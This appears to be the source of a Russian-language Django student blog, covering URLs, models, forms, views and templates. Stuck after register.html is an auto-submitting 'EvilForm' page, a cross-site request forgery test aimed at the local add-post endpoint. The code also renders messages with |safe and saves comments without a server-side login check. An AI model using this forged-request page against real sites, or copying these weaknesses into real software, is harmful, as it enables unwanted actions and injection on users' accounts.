blog_project/blog_app/urls.py
from django.urls import path
from .views import *

urlpatterns = [
    path('', PostIndex.as_view(), name='main'),
    path('about/', about, name='about'),
    path('category/<slug:cat_slug>/', PostCategory.as_view(), name='category'),
    path('post/<slug:post_slug>', show_post, name='showpost'),
    path('addpost/', AddPost.as_view(), name='addpost'),
    path('login/', LoginUserView.as_view(), name='login'),
    path('logout/', logout_user, name='logout'),
    path('search/', SearchResultsView.as_view(), name="search_results")
]

blog_project/blog_project/urls.py
from django.contrib import admin
from django.urls import path, include

from . import settings
from django.conf.urls.static import static

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('blog_app.urls')),
    path('', include('users.urls')),
]

if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)

blog_project/users/urls.py
from django.contrib import admin
from django.urls import path, include
from .views import *
 
urlpatterns = [
	path('register/', register, name='register'),
	path('edit/', edit, name='edit'),
]

blog_project/blog_app/models.py
from django.db import models

class Post(models.Model):
    title = models.CharField(max_length=255, verbose_name='Название')
    slug = models.SlugField(max_length=255, unique=True, db_index=True, verbose_name='Slug')
    content = models.TextField(blank=True, verbose_name='Содержание')
    photo = models.ImageField(upload_to="photos/%Y/%m/%d/", verbose_name='Фото')
    time_create = models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')
    time_update = models.DateTimeField(auto_now=True, verbose_name='Дата изменения')
    is_published = models.BooleanField(default=True, verbose_name='Опубликовано')
    cat = models.ForeignKey('Category', on_delete=models.PROTECT, verbose_name='Категория')

    def __str__(self):
        return self.title

    class Meta:
        verbose_name = 'Статья'
        verbose_name_plural = 'Статьи'
        ordering = ['time_create', 'title']


class Category(models.Model):
    name = models.CharField(max_length=100, db_index=True, verbose_name='Название')
    slug = models.SlugField(max_length=255, unique=True, db_index=True, verbose_name='Slug')

    def __str__(self):
        return self.name

    class Meta:
        verbose_name = 'Категория'
        verbose_name_plural = 'Категории'

    
class Comment(models.Model):
    post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')
    name = models.CharField(max_length=80)
    email = models.EmailField()
    body = models.TextField()
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)
    active = models.BooleanField(default=True)

    class Meta:
        ordering = ('created',)

    def __str__(self):
        return f"Comment by {self.name} on {self.post}"

blog_project/blog_app/forms.py
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.models import User

from .models import *
 
class AddPostForm(forms.ModelForm):
    error_css_class = "flash-error"
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['cat'].empty_label = "Категория не указана"

    class Meta:
        model = Post
        fields = ['title', 'slug', 'content', 'photo','is_published', 'cat']
        widgets = {
            'title': forms.TextInput(attrs={'class': 'form-input-comm'}),
            'slug': forms.TextInput(attrs={'class': 'form-input-comm'}),
            'content': forms.Textarea(attrs={'class': 'form-textarea form-textarea-big'}),
        }
    
    # Создание пользовательских валидаторов
    def clean_title(self):
        title = self.cleaned_data['title']
        if len(title) > 200:
            raise forms.ValidationError('Оу, длина превышает 200 символов!')
        return title


class CommentForm(forms.ModelForm):
    name = forms.CharField(label='Ваше имя', widget=forms.TextInput(attrs={'class': 'form-input-comm'}))
    email = forms.CharField(label='Почта', widget=forms.TextInput(attrs={'class': 'form-input-comm'}))
    body = forms.CharField(label='Комментарий', widget=forms.Textarea(attrs={'class': 'form-textarea'}))

    class Meta:
        model = Comment
        fields = ('name', 'email', 'body')


class LoginUserForm(AuthenticationForm):
    username = forms.CharField(label='Ваш логин', widget=forms.TextInput(attrs={'class': 'form-input'}))
    password = forms.CharField(label='Пароль', widget=forms.PasswordInput(attrs={'class': 'form-input'}))

blog_project/blog_app/views.py
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse_lazy
from django.views.generic import ListView, CreateView
from django.contrib.auth.views import LoginView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth import logout, login
from django.db.models import Q
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage

from .models import *
from .forms import *
from .utils import *


class PostIndex(DataMixin, ListView):
    model = Post
    template_name = 'blog_app/index.html'
    context_object_name = 'posts'
    paginate_by = 3

    def get_context_data(self, *, object_list=None, **kwargs):
        context = super().get_context_data(**kwargs)
        c_def = self.get_user_context(title='Главная страница')
        return context|c_def

    def get_queryset(self):
        return Post.objects.filter(is_published=True).order_by('-time_create')

class SearchResultsView(DataMixin, ListView):
    model = Post
    template_name = 'blog_app/search_list.html'
 
    def get_context_data(self, *, object_list=None, **kwargs):
        context = super().get_context_data(**kwargs)
        context['query'] = self.request.GET.get('q')
        c_def = self.get_user_context(title='Поиск')
        return context|c_def

    def get_queryset(self): # новый
        query = self.request.GET.get('q')
        object_list = Post.objects.filter(
            Q(title__icontains=query) | Q(content__icontains=query)
        )
        return object_list
        

class PostCategory(DataMixin, ListView):
    model = Post
    template_name = 'blog_app/index.html'
    context_object_name = 'posts'
    allow_empty = False

    def get_queryset(self):
        return Post.objects.filter(cat__slug=self.kwargs['cat_slug'], is_published=True)

    def get_context_data(self, *, object_list=None,**kwargs):
        context = super().get_context_data(**kwargs)
        context['title'] = 'Категория' + str(context['posts'][0].cat)
        c_def = self.get_user_context(title='Категория - '  + str(context['posts'][0].cat))
        return context|c_def

       
def show_post(request, post_slug):
    cats = Category.objects.all()
    post = get_object_or_404(Post, slug=post_slug)
    
    comments = post.comments.filter(active=True)
    new_comment = None

    if request.method == 'POST':
        comment_form = CommentForm(data=request.POST)
        if comment_form.is_valid():
            new_comment = comment_form.save(commit=False)
            new_comment.post = post     #Привязываем комментарий к выбранному посту
            new_comment.save()
    else:
        comment_form = CommentForm()


    context = {
        'cats': cats,
        'post': post,
        'comments': comments,
        'new_comment': new_comment,
        'comment_form': comment_form,
        'title': post.title,
    }
    return render(request, 'blog_app/post.html', context=context)


class AddPost(LoginRequiredMixin,DataMixin, CreateView):
    form_class = AddPostForm
    template_name = 'blog_app/addpost.html'
    success_url = reverse_lazy('main')
    login_url = reverse_lazy('main')
    raise_exception = True

    def get_context_data(self, *, object_list=None, **kwargs):
        context = super().get_context_data(**kwargs)
        c_def = self.get_user_context(title='Добавление записи')
        return context|c_def


class LoginUserView(DataMixin, LoginView):
    form_class = LoginUserForm
    template_name = 'blog_app/login.html'

    def get_context_data(self, *, object_list=None, **kwargs):
        context = super().get_context_data(**kwargs)
        c_def = self.get_user_context(title='Авторизация')
        return context|c_def

    def get_success_url(self):
        return reverse_lazy('main') 


def logout_user(request):
    logout(request)
    return redirect('login')

def about(request):
    cats = Category.objects.all()
    return render(request, 'blog_app/about.html', {'cats': cats})

blog_project/blog_app/templates/blog_app/about.html
{% extends 'blog_app/base.html' %}

{% block title %}
О нас
{% endblock %}

{% block body %}

{% endblock %}

blog_project/blog_app/templates/blog_app/addpost.html
{% extends 'blog_app/base.html' %}

{% block body %}

<div id="wrapper">
    <div class="aside"></div>
    <div class="main">
        <div class="container mt-5">
            <form action="{% url 'addpost' %}" method="post" enctype="multipart/form-data">
                {% csrf_token %}
                <h1>{{ title }}</h1>
                {% if form.non_field_errors %}
                    <div class="flash-error">{{ form.non_field_errors }}</div>
                {% endif %}

                {% for f in form %}
                <div class="post-wrap"><p><label class="form-label" for="{{ f.id_for_label }}">{{ f.label }}</label>{{ f }}</p></div>
                {% if f.errors %}
                    <div class="flash-error">{{ f.errors }}</div>
                {% endif %}
                {% endfor %}
                <button class="form-button" type="submit">Добавить</button>
            </form>
        </div>
    </div>
</div>
{% endblock %}

blog_project/blog_app/templates/blog_app/base.html
{% load static %}

<!DOCTYPE html>
<html lang="ru">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="ie-edge">
        <link type="text/css" href="{% static 'blog_app/css/styles.css' %}" rel="stylesheet" />
	    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>{{title}}</title>    
    </head>
    <body>
        <div class="wrapper">
            <header class="header">
                <div class="container">
                    <div class="header-row">
                        <a href="/" class="header-image">
                            <img src="../../static/blog_app/img/logo-kbt.png" alt="logo">
                        </a>
                        <nav class="header-menu">
                            <ul class="header-list">
                                <li class="list-item-header"><a class="item-link" href="{% url 'main' %}">Главная</a></li>
                                <li class="list-item-header"><a class="item-link" href="{% url 'about' %}">Контакты</a></li>
                                {% for c in cats %}
                                <li class="list-item-header"><a class="item-link" href="{% url 'category' c.slug %}">{{ c.name }}</a></li>
                                {% endfor %}
                                <li class="list-item-header"><a class="item-link" href="{% url 'addpost' %}">Добавить статью</a></li>
                            </ul>
                        </nav>
                        <div class="header-actions">
                            {% if request.user.is_authenticated %}
                            <div class="actions-item"><a href="{% url 'edit' %}" class="actions-item">{{ user.username }}</a><a href="{% url 'logout' %}">Выйти</a></div>
                            {% else %}
                            <div class="actions-item"><a href="{% url 'register' %}">Регистрация</a></div>
                            <div class="actions-item"><a href="{% url 'login' %}">Войти</a></div>
                            {% endif %}
                        </div>
                    </div>
                </div>
            </header>
            <main class="page">
                <div class="container">
                    {% if messages %}
                        <ul class="messages">
                        {% for message in messages %}
                            <li class="flash flash-{{message.tags}}">
                            {{ message|safe }}
                            <a href="#" class="close">x</a>
                            </li>
                        {% endfor %}
                        </ul>
                    {% endif %}
                    {% block body %}{% endblock %}
                </div>
            </main>
            <footer class="footer">
                <div class="container">
                    <div class="footer-row">
                        <div class="footer-text">Все права защищены &copy; 2022</div>
                        <nav class="footer-menu">
                            <ul class="footer-list">
                                <li class="list-item-footer"><a class="item-link-footer" href="/about">О нас</a></li>
                                <li class="list-item-footer"><a class="item-link-footer" href="https://cbcol.mskobr.ru/#/">Перейти на сайт колледжа</a></li>
                                <li class="list-item-footer"><a class="item-link-footer" href="tel:89771448391">8(977) 144-83-91</a></li>
                            </ul>
                        </nav>
                        <a href="https://vk.com/yamaher_x" class="footer-vk">
                            <img src="../../static/blog_app/img/icons-vk.svg" alt="Vk">
                            <div class="footer-text-vk">Вконтакте</div>
                        </a>
                    </div>
                </div>
            </footer>
        </div>
    </body>
</html>

blog_project/blog_app/templates/blog_app/index.html
{% extends 'blog_app/base.html' %}
{% load humanize %}

{% block title %}
{{ title }}
{% endblock %}

{% block body %}
<div id="wrapper">
    <div class="main">
        <h1>Добро пожаловать, {{ user.username|default:'Гость' }}!</h1><br>

        <ul class="list-articles">
            {% for p in posts %}
                <li class="item">
                    <div class="article-panel">
                        <p class="first">Категория: {{ p.cat }}</p>
                        <p class="last">Дата: {{ p.time_create|naturaltime }}</p>
                    </div>
                    <h2 class="item-title">{{p.title}}</h2>
                    <div class="body-item">
                        {% if p.photo %}
                        <div class="item-photo">
                            <p><img class="img-article-left thumb" src="{{ p.photo.url }}"></p>
                        </div>
                        {% endif %}
                        {% autoescape on %}
                        <div class="item-text">
                        <p class="post-text">{{p.content|truncatewords:50}}</p>
                        </div>
                        {% endautoescape %}
                    </div>
                    <div class="item-button">
                        <a class="button-link" href="{% url 'showpost' p.slug %}">Читать пост</a>
                    </div>
                </li>
            {% endfor %}
        </ul>
    </div>
</div>
{% endblock %}

blog_project/blog_app/templates/blog_app/login.html
{% extends 'blog_app/base.html' %}

{% block body %}
<div id="wrapper">
    <div class="aside"></div>
    <div class="main_avtoriza">
        <div class="pole_avtoriza" id="auth-block"><br>
            <h1 class="name_avtoriza">Авторизация</h1><br>
            <form method="post">
                {% csrf_token %}

                {% if form.non_field_errors %}
                    <div class="flash-error">{{ form.non_field_errors }}</div>
                {% endif %}

                {% for f in form %}
                    <p><label class="form-label" for="{{ f.id_for_label }}">{{ f.label }}: </label>{{ f }}</p>
                    {% if f.errors %}
                        <div class="flash-error">{{ f.errors }}</div>
                    {% endif %}
                {% endfor %}
                <button class="form-button" type="submit">Вход</button>
            </form>
        </div>
    </div>
</div>
{% endblock %}

blog_project/blog_app/templates/blog_app/pagination.html
<div>
    <span>
    {% if page.has_previous %}
        <a href="?page={{page.previous_page_number}}">Previous</a>
    {% endif %}
    <span>
        Page {{ page.number }} of {{ page.paginator.num_pages }}.
    </span>
    {% if page.has_next %}
        <a href="?page={{ page.next_page_number }}">Next</a>
    {% endif %}
    </span>
</div>

blog_project/blog_app/templates/blog_app/post.html
{% extends 'blog_app/base.html' %}
{% load humanize %}

{% block title %}
{{ title }}
{% endblock %}

{% block body %}
<div id="wrapper">
    <div class="aside"></div>
    <div class="main">
        <div class="container mt-5">
            <p><h1>{{ post.title }}</h1></p>

            {% if post.photo %}
            <p><img class="img-article-left" src="{{ post.photo.url }}"></p>
            {% endif %}

            <p class="post-text">{{post.content|linebreaksbr}}</p>

            <br><hr class="hr-comments">
            {% with comments.count as total_comments %}
            <h2>{{ total_comments }} comment{{ total_comments|pluralize }}</h2>
            {% endwith %}

            {% for comment in comments %}
            <div class="comment">
                <p class="info">
                    Комментарий {{ forloop.counter }} | от {{ comment.name }} |
                    {{ comment.created|naturaltime }}
                </p>
                {{ comment.body|linebreaks }}
                <hr>
            </div>
            {% empty %}
                <p>Здесь пока что нет комментариев.</p>
            {% endfor %}


            {% if user.is_authenticated %}
                {% if new_comment %}
                    <div class="flash-success">Ваш комментарий был опубликован.</div>
                {% else %}
                    <h2>Добавьте новый комментарий</h2>
                    <form method="post">
                    {% csrf_token %}
                    {% for f in comment_form %}
                        <div class="post-wrap"><label class="form-label" for="{{ f.id_for_label }}">{{ f.label }}: </label>{{ f }}</div>
                        {% if f.errors %}
                            <div class="flash-error">{{ f.errors }}</div>
                        {% endif %}
                    {% endfor %}
                    <p><input type="submit" value="Добавить комментарий"></p>
                    </form>
                {% endif %}
            {% else %}
                <h2>Авторизуйтесь, чтобы оставить комментарий!</h2>
            {% endif %}
        </div>
    </div>
</div>
{% endblock %}

blog_project/blog_app/templates/blog_app/register.html
{% extends 'blog_app/base.html' %}

{% block body %}
<div id="wrapper">
    <div class="aside"></div>
    <div class="main_avtoriza">
        <div class="pole_avtoriza" id="auth-block"><br>
            <h1>{{ title }}</h1>
            <form method="post">
                {% csrf_token %}
                {% for f in form %}
                    <p><label class="form-reg-label" for="{{ f.id_for_label }}">{{ f.label }}: </label>{{ f }}</p>
                    {% if f.errors %}
                        <div class="flash-error">{{ f.errors }}</div>
                    {% endif %}
                {% endfor %}
                <button class="form-button" type="submit">Регистрация</button>
            </form>
        </div>
    </div>
</div>
{% endblock %}

<html>
<body onload='document.EvilForm.submit()'>

<form action="http://127.0.0.1:8000/addpost method="post" name='EvilForm'>
  <table>
    <tr><th><label for="id_name">Название:</label></th><td>
        <input id="id_first_name" maxlength="100" type="text" required /></td></tr>
    <tr><th><label for="id_content">Содержание:</label></th><td>
        <input id="id_last_name" maxlength="100" type="text" required /></td></tr>
  <input type="submit" value="Submit" />
</form>
</body>
</html>

blog_project/blog_app/templates/blog_app/search_list.html
{% extends 'blog_app/base.html' %}
{% load humanize %}

{% block title %}
{{ title }}
{% endblock %}

{% block body %}
<div id="wrapper">
    <div class="main">
        <h1>Результаты поиска по запросу:<br> {{query}}</h1><br>
        <h3>Найдено {{object_list|length}} совпадений</h3>
        <ul class="list-articles">
            {% for p in object_list %}
                <li class="item">
                    <div class="article-panel">
                        <p class="first">Категория: {{ p.cat }}</p>
                        <p class="last">Дата: {{ p.time_create|naturaltime }}</p>
                    </div>
                    <h2 class="item-title">{{p.title}}</h2>
                    <div class="body-item">
                        {% if p.photo %}
                        <div class="item-photo">
                            <p><img class="img-article-left thumb" src="{{ p.photo.url }}"></p>
                        </div>
                        {% endif %}
                        {% autoescape on %}
                        <div class="item-text">
                        <p class="post-text">{{p.content|truncatewords:50}}</p>
                        </div>
                        {% endautoescape %}
                    </div>
                    <div class="item-button">
                        <a class="button-link" href="{% url 'showpost' p.slug %}">Перейти</a>
                    </div>
                </li>
            {% endfor %}
        </ul>
    </div>
</div>
{% endblock %}